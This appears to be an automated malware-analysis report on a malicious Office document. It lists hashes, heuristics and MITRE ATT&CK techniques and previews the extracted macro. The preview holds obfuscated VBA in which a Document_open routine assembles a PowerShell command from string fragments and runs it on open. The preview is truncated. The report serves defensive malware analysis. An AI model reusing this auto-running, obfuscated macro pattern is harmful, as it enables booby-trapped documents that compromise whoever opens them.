Office (OLE) malware analysis — malicious · 4f41428b5caaa03b

MALICIOUS

Office (OLE)

282.6 KB First seen: 2018-08-05

MD5: 21c810002fe80c3a409b7261bddb9ecd SHA-1: 72c11666be10f521a60d8f47437bdf5d9732472b SHA-256: 4f41428b5caaa03b34e9cb6c574651978d0efe2bcf326c7c57faf1f7f970cbdf

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is an OLE document with a high-severity heuristic indicating the presence of VBA macros. A critical heuristic confirms a Shell() call within the VBA code, and the Document_open macro is present. This suggests the macro is designed to execute arbitrary commands upon opening the document, likely to download and execute a secondary payload. The embedded URL is benign.

Heuristics 5

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 289,351 bytes but its declared streams total only 167,919 bytes — 121,432 bytes (42%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 41826 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	41826 bytes
SHA-256: `0314550ba6f0badfac54dcb25304b6afc4e15526de706e784ab44a3bb53af4d5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wvzPYDcwzv" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next PVmEw = SuSWK - pFFBwH + 47206 - pXbAO / 27780 + JwzhY / 1431 + AcBPSb / 32209 - qcSKk + 99407 / GkCCR + sulphk + wUpmr wKmIGO = kccizB - ftWvwP + 41311 - iDBwPJ / 64630 + WDpRW / 8627 + zfacR / 76842 - lGjszo + 25607 / wnTOf + HIzcCZ + bHjKb BzHpcT = tAlAzH - VXfLB + 94891 - mcLctO / 36422 + RIFwB / 19786 + ZmJsRk / 28010 - kwrwW + 71001 / CrBDO + vMjFd + jcuAFN njSiu = GBNFLG - vDlDP + 41759 - HKQIz / 93943 + jJEGzN / 22269 + Clwat / 71150 - RQXzz + 74299 / nhbmL + dPJkz + WsIwOs RzNiUOaw = Application.Run("kLGRoEXzdsTn", "" + zjpzFdhwiEi + rMiVjDIiPZkqI + mFYSaMtrfV + wozjr + wUfOiGzSwtv + rENSZVbD + XwUOsAb + FlvMazb + nwvvAPGvWY + kmIacLbw + PNjvmiVzSS + dJVGNXVCfE + RwUfnGObA + rkmkFq + VXCiIjLv + BIfzYEbiBPwXz + wwvQiZano) upzmln = aBiWGq - Thhpj + 25916 - WhEHSS / 36618 + bVrwt / 19894 + jPiIkX / 9321 - asEzLr + 85359 / HltXIt + SVUGZN + IzIjAS End Sub Attribute VB_Name = "dNSBdPNUHb" Function mFYSaMtrfV() On Error Resume Next KBOPa = 94770 * GaKNq - bBQzw / ZJUCoh + jwPiQG - tGnqI + jfMNI - 47855 ELdBUj = 70870 - qwahl / (QqstH * fUOaoZ + (33048 * wHtPwp * 60170 * mjvZQp)) vFiUTMEVrA = "" + akSPWUPRw + zDNuPrGiFKlw + "pOW" + EMzhYpDaKNp + amizAUvnjTB + "Er" + jijFpokkRI + XffXtzFRMjva + "sH" + cmrVtwXwGVqE + NuIiMNc + "ElL" + QpTvsMCmI + LzswPVM + " " + KjobEDSXRO + nWbfZAfm + Chr(34) + " \" + Chr(34) iNTpPB = 23969 * rAEOF / 69420 - rroui * 40600 + rwXbRQ + 79261 / jmVaz / 52240 / OnRLB DYQrih = 16266 * sZOoWX / 34674 - kvaVUR * 86424 + makdBd + 36350 / WrswK / 50693 / HMpuwM niufRK = "" + wwjPbBfmjlED + pOGuSifTiJJ + "$( " + iXwSdVzh + DsUMGSZViJhAfq + "Se" aFdUXG = 15451 * AOjSbi / 95750 - nSDCzS * 47772 + EoaJb + 57796 / FBnuuE / 64412 / wkcLr uzLkN = 24877 * PsIjcP / 67344 - wQWXiR * 77095 + DtFtGS + 40530 / hRwtb / 95574 / QiSmum hYPbrJkSX = "" + qRlLoUEpG + qHThzXAw + "t " + pEAZGsLit + RoDojJTNMInPp + "'oFs" + LloWlPQz + lmibtKMKT + "' '" + QsROhlwICo + zjaqXPZAoC + "')" + XklTwaFVbpvsXI + SrwYZNlvTUp + " \" + YfNRVrwziKbjqz + hSOLvhwDCVJz + Chr(34) + " " dlKbD = 19073 * bBRHdo / 63189 - oiQdJ * 72314 + ajwqi + 18586 / AhwJi / 62432 / ZPuzEG khFhiS = "" + RtQhNnt + ObKbdMbXMBjK + Chr(43) + " [S" + AjPTVfFf + ijwScAMnacP + "TRIn" + wlhWjtONtzj + wTXqbjp + "g](" + wPIvLowjruvARh + YlXOliNC + "'36" + tPjAjPw + RNliZRJGpUAhl + "{78r" CzRSLO = 4953 * TIvjA / 82401 - jCPtX * 91458 + DwzbcX + 67001 / VIjCzi / 96032 / qaOIRZ KGokla = 72824 * kLWvGb / 88084 - DwtQw * 16627 + YhcNk + 43135 / hKsDLR / 58175 / CurDC JPbozS = 84839 * lPuSV / 69213 - iWrnmA * 96032 + fiWYSI + 75885 / dUMRN / 93833 / dDQUQi XMEBFN = "" + oCJqRSp + BoPCJNBUEiLD + "70" + cviwwZUjM + nKafNPVVWKc + "x80s" + thqIXbfzlm + mVqzMVbiVVCapr + "61r" + ijFzjIDRiLJlC + YtjbtfX + "110" + BjzXiPTjMpPEj + dSYOALpfn + ">1" + jFQVLKXQzAI + TsdZNTwrMUzaG + "01s1" + cLAMDziN + dFhQjOVmlvIiQ + "19" + XnUkSuEBOo + wcnkiNijNPbcFb + "G45~" + NAuvisfMOc + YDTczPYJwKiVij + "111G" MrfqG = 70291 * NuqRDz / 51392 - BQlKK * 91283 + fqDiVC + 43646 / NzmXA / 43362 / GqoQGi PssLYK = "" + MXocFwYvMN + ncOkqVdSRaazD + "98" + WupRXshRzOtTQa + nJISNZfP + "G10" + fEmzoZvACBX + wGKRWwCMraPnp + "6~10" + hwOZEtNdfAZUX + omrUMMDIJT + "1>9" + ndWKwiDSF + rvjciQwcivTldw + "9l" + fioFFubZAIqa + zSBnzZdjYr + "116>" + fWUrtOdwYoRis + JcVaVmKwAk + "32l7" + vFvFwsOPEEIPcz + IBTvCFTHCRrEUX + "8>" + ERirciVp + PEUGwYsPpzRu + "10" dHVwiD = 13345 * BmsPWc / 97470 - ptdjEh * 45943 + jiOJUm + 62806 / tTMhc / 73262 / qNIdX pvPSn = 55732 * AXBFM / 64844 - pzQLBm * 44826 + ftqozi + 14968 / UBiJWJ / 34167 / Chzqh loCfAK = 90456 * lBLKOC / 37590 - jdRVpO * 75502 + STMFhU + 80225 / YrFnj / 80626 / TmhTSu vlZcoRz = "" + ZDBKzEFWwjtPzo + OFcVCPQDDT + "1r11" + vDAwmmpGS + LozQwjWZBQiO + "6s46" mFYSa ... (truncated)

SHA-256: 0314550ba6f0badfac54dcb25304b6afc4e15526de706e784ab44a3bb53af4d5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "wvzPYDcwzv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   PVmEw = SuSWK - pFFBwH + 47206 - pXbAO / 27780 + JwzhY / 1431 + AcBPSb / 32209 - qcSKk + 99407 / GkCCR + sulphk + wUpmr
   wKmIGO = kccizB - ftWvwP + 41311 - iDBwPJ / 64630 + WDpRW / 8627 + zfacR / 76842 - lGjszo + 25607 / wnTOf + HIzcCZ + bHjKb
   BzHpcT = tAlAzH - VXfLB + 94891 - mcLctO / 36422 + RIFwB / 19786 + ZmJsRk / 28010 - kwrwW + 71001 / CrBDO + vMjFd + jcuAFN
   njSiu = GBNFLG - vDlDP + 41759 - HKQIz / 93943 + jJEGzN / 22269 + Clwat / 71150 - RQXzz + 74299 / nhbmL + dPJkz + WsIwOs
RzNiUOaw = Application.Run("kLGRoEXzdsTn", "" + zjpzFdhwiEi + rMiVjDIiPZkqI + mFYSaMtrfV + wozjr + wUfOiGzSwtv + rENSZVbD + XwUOsAb + FlvMazb + nwvvAPGvWY + kmIacLbw + PNjvmiVzSS + dJVGNXVCfE + RwUfnGObA + rkmkFq + VXCiIjLv + BIfzYEbiBPwXz + wwvQiZano)
   upzmln = aBiWGq - Thhpj + 25916 - WhEHSS / 36618 + bVrwt / 19894 + jPiIkX / 9321 - asEzLr + 85359 / HltXIt + SVUGZN + IzIjAS
End Sub


Attribute VB_Name = "dNSBdPNUHb"
Function mFYSaMtrfV()
On Error Resume Next
KBOPa = 94770 * GaKNq - bBQzw / ZJUCoh + jwPiQG - tGnqI + jfMNI - 47855
   ELdBUj = 70870 - qwahl / (QqstH * fUOaoZ + (33048 * wHtPwp * 60170 * mjvZQp))
vFiUTMEVrA = "" + akSPWUPRw + zDNuPrGiFKlw + "pOW" + EMzhYpDaKNp + amizAUvnjTB + "Er" + jijFpokkRI + XffXtzFRMjva + "sH" + cmrVtwXwGVqE + NuIiMNc + "ElL" + QpTvsMCmI + LzswPVM + "   " + KjobEDSXRO + nWbfZAfm + Chr(34) + " \" + Chr(34)
iNTpPB = 23969 * rAEOF / 69420 - rroui * 40600 + rwXbRQ + 79261 / jmVaz / 52240 / OnRLB
   DYQrih = 16266 * sZOoWX / 34674 - kvaVUR * 86424 + makdBd + 36350 / WrswK / 50693 / HMpuwM
niufRK = "" + wwjPbBfmjlED + pOGuSifTiJJ + "$( " + iXwSdVzh + DsUMGSZViJhAfq + "Se"
aFdUXG = 15451 * AOjSbi / 95750 - nSDCzS * 47772 + EoaJb + 57796 / FBnuuE / 64412 / wkcLr
   uzLkN = 24877 * PsIjcP / 67344 - wQWXiR * 77095 + DtFtGS + 40530 / hRwtb / 95574 / QiSmum
hYPbrJkSX = "" + qRlLoUEpG + qHThzXAw + "t " + pEAZGsLit + RoDojJTNMInPp + "'oFs" + LloWlPQz + lmibtKMKT + "'  '" + QsROhlwICo + zjaqXPZAoC + "')" + XklTwaFVbpvsXI + SrwYZNlvTUp + " \" + YfNRVrwziKbjqz + hSOLvhwDCVJz + Chr(34) + " "
dlKbD = 19073 * bBRHdo / 63189 - oiQdJ * 72314 + ajwqi + 18586 / AhwJi / 62432 / ZPuzEG
khFhiS = "" + RtQhNnt + ObKbdMbXMBjK + Chr(43) + " [S" + AjPTVfFf + ijwScAMnacP + "TRIn" + wlhWjtONtzj + wTXqbjp + "g](" + wPIvLowjruvARh + YlXOliNC + "'36" + tPjAjPw + RNliZRJGpUAhl + "{78r"
CzRSLO = 4953 * TIvjA / 82401 - jCPtX * 91458 + DwzbcX + 67001 / VIjCzi / 96032 / qaOIRZ
   KGokla = 72824 * kLWvGb / 88084 - DwtQw * 16627 + YhcNk + 43135 / hKsDLR / 58175 / CurDC
   JPbozS = 84839 * lPuSV / 69213 - iWrnmA * 96032 + fiWYSI + 75885 / dUMRN / 93833 / dDQUQi
XMEBFN = "" + oCJqRSp + BoPCJNBUEiLD + "70" + cviwwZUjM + nKafNPVVWKc + "x80s" + thqIXbfzlm + mVqzMVbiVVCapr + "61r" + ijFzjIDRiLJlC + YtjbtfX + "110" + BjzXiPTjMpPEj + dSYOALpfn + ">1" + jFQVLKXQzAI + TsdZNTwrMUzaG + "01s1" + cLAMDziN + dFhQjOVmlvIiQ + "19" + XnUkSuEBOo + wcnkiNijNPbcFb + "G45~" + NAuvisfMOc + YDTczPYJwKiVij + "111G"
MrfqG = 70291 * NuqRDz / 51392 - BQlKK * 91283 + fqDiVC + 43646 / NzmXA / 43362 / GqoQGi
PssLYK = "" + MXocFwYvMN + ncOkqVdSRaazD + "98" + WupRXshRzOtTQa + nJISNZfP + "G10" + fEmzoZvACBX + wGKRWwCMraPnp + "6~10" + hwOZEtNdfAZUX + omrUMMDIJT + "1>9" + ndWKwiDSF + rvjciQwcivTldw + "9l" + fioFFubZAIqa + zSBnzZdjYr + "116>" + fWUrtOdwYoRis + JcVaVmKwAk + "32l7" + vFvFwsOPEEIPcz + IBTvCFTHCRrEUX + "8>" + ERirciVp + PEUGwYsPpzRu + "10"
dHVwiD = 13345 * BmsPWc / 97470 - ptdjEh * 45943 + jiOJUm + 62806 / tTMhc / 73262 / qNIdX
   pvPSn = 55732 * AXBFM / 64844 - pzQLBm * 44826 + ftqozi + 14968 / UBiJWJ / 34167 / Chzqh
   loCfAK = 90456 * lBLKOC / 37590 - jdRVpO * 75502 + STMFhU + 80225 / YrFnj / 80626 / TmhTSu
vlZcoRz = "" + ZDBKzEFWwjtPzo + OFcVCPQDDT + "1r11" + vDAwmmpGS + LozQwjWZBQiO + "6s46"
mFYSa
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.